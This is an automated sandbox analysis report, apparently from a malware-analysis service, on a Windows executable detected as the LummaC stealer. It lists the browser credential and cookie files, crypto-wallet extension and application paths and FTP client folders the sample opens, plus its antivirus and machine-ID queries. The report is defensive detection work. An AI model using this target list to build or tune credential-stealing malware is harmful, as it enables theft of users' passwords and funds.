Source: UmotQ1qjLq.exe, UmotQ1qjLq.exe, 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: uProgram Manager

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Code function: 0_2_00B48040 cpuid

0_2_00B48040

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: UmotQ1qjLq.exe, 00000000.00000003.1966532207.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1975304108.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.1966934832.0000000005C11000.00000004.00000800.00020000.00000000.sdmp, UmotQ1qjLq.exe, 00000000.00000003.2017195946.00000000016D6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: UmotQ1qjLq.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: UmotQ1qjLq.exe, 00000000.00000003.1953079056.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx2]
Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs"
Source: UmotQ1qjLq.exe, 00000000.00000003.1953079056.00000000016D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: UmotQ1qjLq.exe, 00000000.00000003.1953254503.000000000163C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: UmotQ1qjLq.exe, 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs"

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN			Jump to behavior
Source: C:\Users\user\Desktop\UmotQ1qjLq.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN			Jump to behavior

Source: Yara match	File source: 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1953190112.0000000001672000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2017085147.0000000001672000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1950540598.0000000001671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: UmotQ1qjLq.exe PID: 6256, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: UmotQ1qjLq.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

